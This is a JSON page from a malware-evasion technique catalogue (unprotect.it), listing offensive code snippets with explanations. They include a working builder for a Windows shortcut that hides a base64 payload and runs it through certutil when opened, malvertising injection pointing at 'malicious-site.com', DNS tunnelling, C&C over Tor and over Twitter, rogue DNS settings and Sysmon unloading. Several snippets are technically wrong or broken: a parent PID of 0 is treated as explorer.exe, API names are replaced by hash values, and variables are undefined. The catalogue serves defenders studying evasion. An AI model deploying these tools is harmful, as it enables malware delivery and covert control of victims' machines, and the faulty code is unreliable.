HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 206,
"next": "https://unprotect.it/api/snippets/?format=api&page=3",
"previous": "https://unprotect.it/api/snippets/?format=api",
"results": [
{
"id": 160,
"language": {
"id": 11,
"label": "JavaScript",
"code_class": "Javascript"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/145/?format=api",
"description": "In this example, a new div element is created and inserted into the webpage using JavaScript. The div contains a link to a malicious website and an image from that website, which would be displayed as an ad on the page. Of course, in a real-world scenario, the code would be more complex and obfuscated to avoid detection.",
"plain_code": "<script>\r\n // Code to insert malicious ad onto webpage\r\n var adElement = document.createElement(\"div\");\r\n adElement.innerHTML = \"<a href='http://malicious-site.com'><img src='http://malicious-site.com/malicious-ad.jpg' /></a>\";\r\n document.body.appendChild(adElement);\r\n</script>"
},
{
"id": 159,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/137/?format=api",
"description": "This code uses the dnslib and socket modules to create and send a DNS query for the specified domain name to a DNS server. It then receives a DNS response from the server, modifies the response to include the IP addresses of the compromised hosts that will act as proxies, and sends the modified response back to the client.\r\n\r\nThis code simulates the operation of a DNS server that is being used for fast flux. In a real-world scenario, the DNS server would be under the control of the botnet, and the domain name and proxy addresses would be generated dynamically.",
"plain_code": "import dnslib\r\nimport socket\r\n\r\n# Replace with the IP address of the DNS server\r\ndns_server = \"8.8.8.8\"\r\n\r\n# Replace with the domain name that you control\r\ndomain_name = \"example.com\"\r\n\r\n# Replace with the IP addresses of the compromised hosts that will act as proxies\r\nproxy_addresses = [\"10.0.0.1\", \"10.0.0.2\", \"10.0.0.3\"]\r\n\r\n# Create a DNS query for the domain name\r\nquery = dnslib.DNSRecord.question(domain_name)\r\n\r\n# Send the DNS query to the DNS server\r\ndns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ndns_socket.sendto(query.pack(), (dns_server, 53))\r\n\r\n# Receive the DNS response from the DNS server\r\nresponse = dnslib.DNSRecord.parse(dns_socket.recv(4096))\r\n\r\n# Modify the DNS response to include the IP addresses of the compromised hosts\r\nresponse.add_answer(*dnslib.RR.fromZone(\"example.com A \" + \" \".join(proxy_addresses)))\r\n\r\n# Send the modified DNS response to the client\r\ndns_socket.sendto(response.pack(), (client_address, client_port))"
},
{
"id": 158,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/138/?format=api",
"description": "This code uses the random and datetime modules to generate a random number using the current date and time as a seed. It then constructs a domain name by concatenating the base domain name with the generated number. Finally, it prints the generated domain name.\r\n\r\nNote that this is just an example, and there are many different ways that a DGA could be implemented. In a real-world scenario, the malware would use the generated domain name to communicate with its command and control server, and the domain name would be generated periodically using a pseudorandom number generator.",
"plain_code": "import random\r\nimport datetime\r\n\r\n# Replace with the base domain name that you control\r\nbase_domain = \"example.com\"\r\n\r\n# Get the current date and time\r\ndate = datetime.datetime.now()\r\n\r\n# Generate a random number using the date and time as a seed\r\nrandom.seed(date)\r\nnumber = random.randint(0, 1000000)\r\n\r\n# Generate a domain name using the base domain and the random number\r\ndomain_name = str(number) + \".\" + base_domain\r\n\r\n# Print the generated domain name\r\nprint(domain_name)"
},
{
"id": 157,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/140/?format=api",
"description": "This code uses the dnslib and socket modules to encode the specified data as a base64 string and send it as a DNS query to the specified DNS server. The DNS query uses the domain name and subdomain that the attacker controls, with the encoded data as the subdomain label. The code then receives a DNS response from the server, decodes the data payload, and prints it.",
"plain_code": "import dnslib\r\nimport socket\r\n\r\n# Replace with the IP address of the DNS server\r\ndns_server = \"8.8.8.8\"\r\n\r\n# Replace with the domain name and subdomain that you control\r\ndomain_name = \"example.com\"\r\nsubdomain = \"tunnel\"\r\n\r\n# Replace with the data that you want to transfer\r\ndata = b\"hello\"\r\n\r\n# Encode the data as a base64 string\r\nencoded_data = base64.b64encode(data)\r\n\r\n# Create a DNS query with the encoded data as the subdomain label\r\nquery = dnslib.DNSRecord.question(subdomain + \".\" + domain_name)\r\n\r\n# Send the DNS query to the DNS server\r\ndns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ndns_socket.sendto(query.pack(), (dns_server, 53))\r\n\r\n# Receive the DNS response from the DNS server\r\nresponse = dnslib.DNSRecord.parse(dns_socket.recv(4096))\r\n\r\n# Decode the DNS response and extract the data payload\r\ndecoded_data = base64.b64decode(response.rr[0].rdata.label)\r\n\r\n# Print the decoded data\r\nprint(decoded_data)"
},
{
"id": 156,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/141/?format=api",
"description": "",
"plain_code": "import subprocess\r\n\r\n# Replace with the IP address of the rogue DNS server\r\nrogue_dns_server = \"10.0.0.1\"\r\n\r\n# Get the current DNS server settings\r\ncurrent_dns_servers = subprocess.check_output([\"netsh\", \"interface\", \"ip\", \"show\", \"dnsservers\"])\r\n\r\n# Modify the DNS server settings to point to the rogue DNS server\r\nsubprocess.call([\"netsh\", \"interface\", \"ip\", \"add\", \"dnsservers\", \"Wi-Fi\", rogue_dns_server])\r\n\r\n# Confirm that the DNS server settings have been changed\r\nnew_dns_servers = subprocess.check_output([\"netsh\", \"interface\", \"ip\", \"show\", \"dnsservers\"])\r\nif new_dns_servers"
},
{
"id": 155,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/142/?format=api",
"description": "This code uses the stem library to connect to the Tor control port and authenticate with the control password. It then creates a new circuit to the specified C&C server and resolves its address using stem.util.connection.resolve_address(). The code then establishes a connection to the C&C server over the Tor network and sends and receives data from it.",
"plain_code": "import stem\r\nimport stem.connection\r\nimport stem.util.system\r\n\r\n# Replace with the address of your C&C server\r\ncc_server = \"xyzabc123.onion\"\r\n\r\n# Connect to the Tor control port\r\ncontrol_socket = stem.socket.ControlPort(port = 9051)\r\n\r\n# Authenticate with the Tor control port\r\nstem.connection.authenticate_password(control_socket, control_password)\r\n\r\n# Start a new circuit to the C&C server\r\ncircuit_id = stem.control.Controller.from_port(port = 9051).new_circuit(path = [], await_build = True)\r\n\r\n# Resolve the C&C server's address\r\ncc_server_ip = stem.util.connection.resolve_address(cc_server)\r\n\r\n# Connect to the C&C server\r\ncc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ncc_socket.connect((cc_server_ip, 80))\r\n\r\n# Send data to the C&C server\r\ncc_socket.sendall(b\"hello\")\r\n\r\n# Receive data from the C&C server\r\ndata = cc_socket.recv(1024)"
},
{
"id": 154,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/143/?format=api",
"description": "This code creates a simple server that listens for incoming connections on port 8000. When a new connection is accepted, the client is added to a list of clients. The server then receives data from the client and sends it to all of the other clients in the list. This allows the clients to communicate with each other in a peer-to-peer fashion, without the need for a central server.\r\n\r\nNote that this is just an example, and there are many different ways that a P2P network could be used for a botnet's C&C. This code should not be used in production without further testing and security measures.",
"plain_code": "import socket\r\n\r\n# Create a socket for the server\r\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n# Bind the socket to a local address\r\nserver_socket.bind((\"0.0.0.0\", 8000))\r\n\r\n# Listen for incoming connections\r\nserver_socket.listen()\r\n\r\n# Create a list to store the clients\r\nclients = []\r\n\r\nwhile True:\r\n # Accept incoming connections\r\n client_socket, client_address = server_socket.accept()\r\n\r\n # Add the client to the list of clients\r\n clients.append(client_socket)\r\n\r\n # Receive data from the client\r\n data = client_socket.recv(1024)\r\n\r\n # Iterate over the clients and send the data to each of them\r\n for client in clients:\r\n client.sendall(data)"
},
{
"id": 153,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/144/?format=api",
"description": "This code uses the tweepy library to access the Twitter API and search for tweets containing the specified keyword (in this case, #command). It then iterates over the resulting tweets and checks for specific commands, such as run and update. You can replace the code in the if and elif blocks with your own code to execute the corresponding commands.\r\n\r\nNote that this is just an example, and there are many different ways that Twitter could be used as a C&C channel. This code should not be used in production without further testing and security measures.",
"plain_code": "import tweepy\r\n\r\n# Replace with your Twitter API keys\r\nconsumer_key = \"YOUR_CONSUMER_KEY\"\r\nconsumer_secret = \"YOUR_CONSUMER_SECRET\"\r\naccess_key = \"YOUR_ACCESS_KEY\"\r\naccess_secret = \"YOUR_ACCESS_SECRET\"\r\n\r\n# Authenticate with Twitter\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\n# Search for tweets with the specified keyword\r\ntweets = api.search(\"#command\")\r\n\r\n# Iterate over the tweets and execute the commands\r\nfor tweet in tweets:\r\n command = tweet.text.split(\" \")[1]\r\n if command == \"run\":\r\n # Run the specified command\r\n # Replace with your code here\r\n pass\r\n elif command == \"update\":\r\n # Update the malware\r\n # Replace with your code here\r\n pass"
},
{
"id": 152,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/98/?format=api",
"description": "The original message is first encoded using the ROL algorithm and the defined rotation value. The encoded message is then printed to the screen. The same rotation value is then used to decode the encoded message, resulting in the original message. This example demonstrates how the ROL algorithm can be used to encode and decode messages in a simple and easily reversible way.",
"plain_code": "# Define the original message to be encoded\r\nmessage = \"Hello, world!\"\r\n\r\n# Define the rotation value\r\nrotation_value = 3\r\n\r\n# Encode the message using the ROL algorithm and the defined rotation value\r\nencoded_message = \"\"\r\nfor char in message:\r\n if char.isalpha():\r\n encoded_message += chr((ord(char) - ord(\"A\") + rotation_value) % 26 + ord(\"A\"))\r\n else:\r\n encoded_message += char\r\n\r\n# Print the resulting encoded message\r\nprint(encoded_message)\r\n\r\n# Decode the encoded message using the ROL algorithm and the same rotation value\r\ndecoded_message = \"\"\r\nfor char in encoded_message:\r\n if char.isalpha():\r\n decoded_message += chr((ord(char) - ord(\"A\") - rotation_value) % 26 + ord(\"A\"))\r\n else:\r\n decoded_message += char\r\n\r\n# Print the resulting decoded message\r\nprint(decoded_message)"
},
{
"id": 151,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/99/?format=api",
"description": "In this code, the cryptography module is imported and used to generate a new encryption key. The key is then used to encrypt the original message using the Fernet algorithm, resulting in an encrypted message. The encrypted message is then printed to the screen. The same key is then used to decrypt the encrypted message, resulting in the original message. This example demonstrates how cryptography can be used to secure the transmission of sensitive information. In the context of malware, this technique could be used to encrypt the payload or communication channels in order to avoid detection and analysis.",
"plain_code": "# Import the cryptography module\r\nfrom cryptography.fernet import Fernet\r\n\r\n# Generate a new encryption key\r\nkey = Fernet.generate_key()\r\n\r\n# Define the original message to be encrypted\r\nmessage = \"Hello, world!\"\r\n\r\n# Encrypt the message using the Fernet algorithm and the generated key\r\nfernet = Fernet(key)\r\nencrypted_message = fernet.encrypt(message.encode('utf-8'))\r\n\r\n# Print the resulting encrypted message\r\nprint(encrypted_message)\r\n\r\n# Decrypt the encrypted message using the Fernet algorithm and the same key\r\ndecrypted_message = fernet.decrypt(encrypted_message)\r\n\r\n# Print the resulting decrypted message\r\nprint(decrypted_message.decode('utf-8'))"
},
{
"id": 150,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/100/?format=api",
"description": "The original message is first encrypted using a custom XOR encryption algorithm. The encrypted message is then encoded using a custom Base64 algorithm. The resulting encoded message is then printed to the screen. This encoded message can then be decrypted and decoded using the same custom algorithms in order to access the original message. This example demonstrates how a malware author could use custom encoding schemes to conceal their payloads.",
"plain_code": "# Define the original message to be encoded\r\nmessage = \"Hello, world!\"\r\n\r\n# Encrypt the message using a custom XOR encryption algorithm\r\nencrypted_message = \"\"\r\nfor i in range(len(message)):\r\n encrypted_message += chr(ord(message[i]) ^ 0x5)\r\n\r\n# Encode the encrypted message using a custom Base64 algorithm\r\nencoded_message = \"\"\r\nbase64_chars = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\nfor i in range(0, len(encrypted_message), 3):\r\n b1 = ord(encrypted_message[i])\r\n b2 = ord(encrypted_message[i + 1]) if i + 1 < len(encrypted_message) else 0\r\n b3 = ord(encrypted_message[i + 2]) if i + 2 < len(encrypted_message) else 0\r\n\r\n c1 = b1 >> 2\r\n c2 = ((b1 & 0x3) << 4) | (b2 >> 4)\r\n c3 = ((b2 & 0xf) << 2) | (b3 >> 6)\r\n c4 = b3 & 0x3f\r\n\r\n encoded_message += base64_chars[c1] + base64_chars[c2] + base64_chars[c3] + base64_chars[c4]\r\n\r\n# Print the resulting encoded message\r\nprint(encoded_message)"
},
{
"id": 149,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/95/?format=api",
"description": "The original message is first converted to binary format using the string data type. The key is also converted to binary format using the same type. The XOR operation is then performed on the binary message using the binary key. The resulting ciphertext is then concatenated to a string and printed to the screen. This ciphertext can then be decrypted using the same key to access the original message.",
"plain_code": "#include <iostream>\r\n#include <string>\r\n\r\nusing namespace std;\r\n\r\nint main()\r\n{\r\n // Define the key to use for the XOR operation\r\n string key = \"mysecretkey\";\r\n\r\n // Define the original message to be encrypted\r\n string message = \"Hello, world!\";\r\n\r\n // Convert the key and message to binary format\r\n string binary_key = key;\r\n string binary_message = message;\r\n\r\n // Perform the XOR operation on the binary message using the binary key\r\n string ciphertext = \"\";\r\n for (int i = 0; i < binary_message.length(); i++)\r\n {\r\n ciphertext += binary_message[i] ^ binary_key[i % binary_key.length()];\r\n }\r\n\r\n // Print the resulting ciphertext\r\n cout << ciphertext << endl;\r\n\r\n return 0;\r\n}"
},
{
"id": 148,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 2,
"name": "Thomas Roccia",
"email": null,
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/95/?format=api",
"description": "The original message is first converted to binary format using the `encode()` method. The key is also converted to binary format using the same method. The XOR operation is then performed on the binary message using the binary key. The resulting ciphertext is then printed to the screen. This ciphertext can then be decrypted using the same key to access the original message.",
"plain_code": "# Define the key to use for the XOR operation\r\nkey = \"mysecretkey\"\r\n\r\n# Define the original message to be encrypted\r\nmessage = \"Hello, world!\"\r\n\r\n# Convert the key and message to binary format\r\nbinary_key = key.encode('utf-8')\r\nbinary_message = message.encode('utf-8')\r\n\r\n# Perform the XOR operation on the binary message using the binary key\r\nciphertext = bytearray(len(binary_message))\r\nfor i in range(len(binary_message)):\r\n ciphertext[i] = binary_message[i] ^ binary_key[i % len(binary_key)]\r\n\r\n# Print the resulting ciphertext\r\nprint(ciphertext)"
},
{
"id": 147,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 1,
"name": "Jean-Pierre LESUEUR",
"email": "jplesueur@phrozen.io",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/102/?format=api",
"description": "This Python script can be used to create a Windows shortcut with an embedded file. The script takes two arguments: the file to embed and the name of the generated shortcut. The script first creates a Windows shortcut using the `winshell` module. The shortcut is configured to run a command that will decode the embedded file and then execute it. The script then encodes the file to be embedded using the base64 module and appends the encoded data to the shortcut file in the form of a certificate. Finally, the script prints the name of the generated shortcut to the screen. When the shortcut is clicked, the embedded file will be extracted and executed, allowing the malware to run on the system.",
"plain_code": "#!/usr/bin/env python3\r\n\r\n# Requirements:\r\n# -> pip install pypiwin32\r\n# -> pip install winshell\r\n\r\nimport argparse\r\nimport base64\r\nimport os\r\nimport pathlib\r\nimport random\r\nimport string\r\n\r\nimport winshell\r\n\r\n\r\ndef build_shortcut(file_to_embed, shortcut_name):\r\n output_shortcut = \"{}{}.lnk\".format(\r\n os.path.join(pathlib.Path(__file__).parent.resolve(), ''),\r\n shortcut_name,\r\n ) \r\n\r\n with winshell.shortcut(output_shortcut) as shortcut: \r\n # @echo off & (for %i in (.lnk) do certutil -decode %i [filename]) & start [filename].exe\r\n payload = \"@echo off&(for %i in (*.lnk) do certutil -decode %i {0}.exe)&start {0}.exe\".format(\r\n \"\".join(random.choice(string.ascii_letters) for i in range(8))\r\n ) \r\n\r\n shortcut.description = \"\"\r\n shortcut.show_cmd = \"min\"\r\n shortcut.working_directory = \"\"\r\n shortcut.path = \"%COMSPEC%\"\r\n\r\n shortcut.arguments = \"/c \\\"{}\".format(\r\n payload,\r\n )\r\n\r\n shortcut.icon_location = (\"%windir%\\\\notepad.exe\", 0)\r\n\r\n with open(file_to_embed, \"rb\") as file:\r\n encoded_content = base64.b64encode(file.read())\r\n\r\n with open(output_shortcut, \"ab\") as file:\r\n file.write(b\"-----BEGIN CERTIFICATE-----\")\r\n file.write(encoded_content)\r\n file.write(b\"-----END CERTIFICATE-----\")\r\n\r\n print(\"[+] Shortcut generated: \\\"{}\\\"\".format(output_shortcut))\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=f\"Create Windows Shortcut with Self-Extracting Embedded File.\")\r\n\r\n parser.add_argument('-f', '--embed-file', type=str, dest=\"embed_file\", required=True, help=\"File to inject in shortcut.\")\r\n\r\n parser.add_argument('-n', '--shorcut-name', type=str, dest=\"shortcut_name\", required=True, help=\"Generated shortcut name.\")\r\n\r\n try:\r\n argv = parser.parse_args() \r\n except IOError as e:\r\n parser.error() \r\n\r\n build_shortcut(argv.embed_file, argv.shortcut_name)\r\n\r\n print(\"[+] Done.\")"
},
{
"id": 146,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/182/?format=api",
"description": "This code uses the `LoadLibrary()` and `GetProcAddress()` functions to load the Sysmon driver and get the address of its `Unload()` function. It then calls the `Unload()` function to unload the driver, which will cause Sysmon to stop recording events and thus evade detection by Sysmon. After the driver has been unloaded, the malware can proceed with its malicious actions without being monitored by Sysmon.",
"plain_code": "// Load the Sysmon driver\r\nHMODULE hModule = LoadLibrary(\"sysmondrv\");\r\n\r\n// Check if the driver was loaded successfully\r\nif (hModule != NULL)\r\n{\r\n // Get the address of the driver's Unload() function\r\n PFN_UNLOAD pfnUnload = (PFN_UNLOAD) GetProcAddress(hModule, \"Unload\");\r\n\r\n // Check if the Unload() function was found\r\n if (pfnUnload != NULL)\r\n {\r\n // Call the Unload() function to unload the driver\r\n pfnUnload();\r\n\r\n // The Sysmon driver has been unloaded\r\n // Malware can now proceed with its malicious actions without being monitored by Sysmon\r\n // ...\r\n }\r\n}"
},
{
"id": 145,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/90/?format=api",
"description": "This code uses the `CreateToolhelp32Snapshot()` and `Process32First()/Process32Next()` functions to iterate over all processes in the system and find the one with the same ID as the current process. It then checks the parent process ID of the current process, and compares it to 0 (the process ID of explorer.exe), to determine whether the parent process is explorer.exe or not. If the parent process is not explorer.exe, then the process is likely being monitored and the malware can take evasive action.",
"plain_code": "#include <Windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nint main()\r\n{\r\n // Get the current process ID\r\n DWORD currentPID = GetCurrentProcessId();\r\n\r\n // Create a snapshot of all processes in the system\r\n HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\r\n // Initialize the process entry structure\r\n PROCESSENTRY32 entry;\r\n entry.dwSize = sizeof(entry);\r\n\r\n // Iterate over all processes in the snapshot\r\n if (Process32First(snapshot, &entry))\r\n {\r\n do\r\n {\r\n // Check if the current process is the one we're looking for\r\n if (entry.th32ProcessID == currentPID)\r\n {\r\n // The parent process ID is the one we want\r\n DWORD parentPID = entry.th32ParentProcessID;\r\n\r\n // Check if the parent process is explorer.exe\r\n if (parentPID == 0)\r\n {\r\n std::cout << \"Parent process is explorer.exe\" << std::endl;\r\n }\r\n else\r\n {\r\n std::cout << \"Parent process is not explorer.exe\" << std::endl;\r\n }\r\n\r\n break;\r\n }\r\n } while (Process32Next(snapshot, &entry));\r\n }\r\n\r\n // Clean up\r\n CloseHandle(snapshot);\r\n\r\n return 0;\r\n}"
},
{
"id": 144,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/180/?format=api",
"description": "In this code, the thwart_stack_frame function uses complex control flow structures and API hashing to make it more difficult for a disassembler to analyze the code and understand its behavior. By using these techniques, malware authors can thwart stack-frame analysis and make it harder for security analysts to reverse engineer and understand their code.",
"plain_code": "#include <stdio.h>\r\n#include <Windows.h>\r\n\r\n// Function to obfuscate the names of APIs\r\nunsigned long hash(const char *str)\r\n{\r\n unsigned long hash = 5381;\r\n int c;\r\n\r\n while (c = *str++)\r\n hash = ((hash << 5) + hash) + c; /* hash * 33 + c */\r\n\r\n return hash;\r\n}\r\n\r\n// Function to thwart stack-frame analysis\r\nvoid thwart_stack_frame()\r\n{\r\n // Use complex control flow structures to make it\r\n // difficult for the disassembler to track the flow\r\n // of execution\r\n int i, j, k;\r\n for (i = 0; i < 10; i++)\r\n {\r\n if (i % 2 == 0)\r\n {\r\n for (j = 0; j < 10; j++)\r\n {\r\n if (j % 2 == 1)\r\n {\r\n for (k = 0; k < 10; k++)\r\n {\r\n if (k % 2 == 0)\r\n {\r\n // Use API hashing to hide the names\r\n // of the APIs we want to call\r\n HMODULE hKernel32 = LoadLibrary((LPCSTR) hash(\"kernel32.dll\"));\r\n LPVOID lpExitProcess = GetProcAddress(hKernel32, (LPCSTR) hash(\"ExitProcess\"));\r\n\r\n // Call the ExitProcess API\r\n ((void (WINAPI *)(UINT))lpExitProcess)(0);\r\n\r\n // Clean up\r\n FreeLibrary(hKernel32);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nint main()\r\n{\r\n thwart_stack_frame();\r\n\r\n return 0;\r\n}"
},
{
"id": 143,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/179/?format=api",
"description": "In this code, the push_seh and pop_seh functions are used to manipulate the SEH chain. The handle_exception function is pushed onto the SEH chain, so that it will be executed when an exception occurs. When the exception is handled, the handle_exception function is popped off the SEH chain. This technique can be used by malware to make it more difficult for security analysts to understand the code and identify any potentially malicious behavior.",
"plain_code": "#include <Windows.h>\r\n#include <stdio.h>\r\n\r\n// Function to push a new function onto the SEH chain\r\nvoid push_seh(LPVOID fn)\r\n{\r\n // Use the FS segment register to gain access to the TEB\r\n __asm\r\n {\r\n mov eax, dword ptr fs:[0]\r\n }\r\n\r\n // The first structure in the TEB is the TIB,\r\n // which contains a pointer to the SEH chain\r\n __asm\r\n {\r\n mov eax, dword ptr[eax + 0x04]\r\n }\r\n\r\n // Push the new function onto the SEH chain\r\n __asm\r\n {\r\n push fn\r\n push dword ptr[eax]\r\n mov dword ptr[eax], esp\r\n }\r\n}\r\n\r\n// Function to pop a function off the SEH chain\r\nvoid pop_seh()\r\n{\r\n // Use the FS segment register to gain access to the TEB\r\n __asm\r\n {\r\n mov eax, dword ptr fs:[0]\r\n }\r\n\r\n // The first structure in the TEB is the TIB,\r\n // which contains a pointer to the SEH chain\r\n __asm\r\n {\r\n mov eax, dword ptr[eax + 0x04]\r\n }\r\n\r\n // Pop the top function off the SEH chain\r\n __asm\r\n {\r\n mov esp, dword ptr[eax]\r\n pop dword ptr[eax]\r\n }\r\n}\r\n\r\n// Function to handle exceptions\r\nDWORD handle_exception(EXCEPTION_POINTERS *ep)\r\n{\r\n // Print a message when an exception occurs\r\n printf(\"Exception occurred!\\n\");\r\n\r\n // Return the exception code to continue execution\r\n return ep->ExceptionRecord->ExceptionCode;\r\n}\r\n\r\nint main()\r\n{\r\n // Push the handle_exception function onto the SEH chain\r\n push_seh(&handle_exception);\r\n\r\n // Cause an exception to occur\r\n __try\r\n {\r\n *(int*)0 = 0;\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER)\r\n {\r\n // Pop the handle_exception function off the SEH chain\r\n pop_seh();\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 142,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/75/?format=api",
"description": "In this code, the hash function is used to obfuscate the names of the APIs that are imported from the kernel32.dll library. The hashed names are then used to call the APIs using the GetProcAddress and LoadLibrary functions. When the code is disassembled, the actual names of the APIs will be hidden and replaced with the hashed values.",
"plain_code": "import ctypes\r\n\r\n# Hash function to obfuscate the API names\r\ndef hash(str):\r\n hash = 5381\r\n for c in str:\r\n hash = (hash * 33 + ord(c)) % 2**32\r\n return hash\r\n\r\n# Load the kernel32.dll library\r\nhKernel32 = ctypes.windll.kernel32\r\n\r\n# Use the hash function to obfuscate the names of the APIs\r\n# we want to call from the library\r\nlpLoadLibraryA = hKernel32.GetProcAddress(hKernel32, hash(\"LoadLibraryA\"))\r\nlpMessageBoxA = hKernel32.GetProcAddress(hKernel32, hash(\"MessageBoxA\"))\r\n\r\n# Call the APIs using the hashed names\r\nhUser32 = ctypes.CFUNCTYPE(ctypes.c_void_p)(lpLoadLibraryA)(\"user32.dll\")\r\nctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_uint)(lpMessageBoxA)(None, \"Hello World!\", \"API Hashing\", 0)\r\n\r\n# Clean up\r\nhKernel32.FreeLibrary(hUser32)"
},
{
"id": 141,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/76/?format=api",
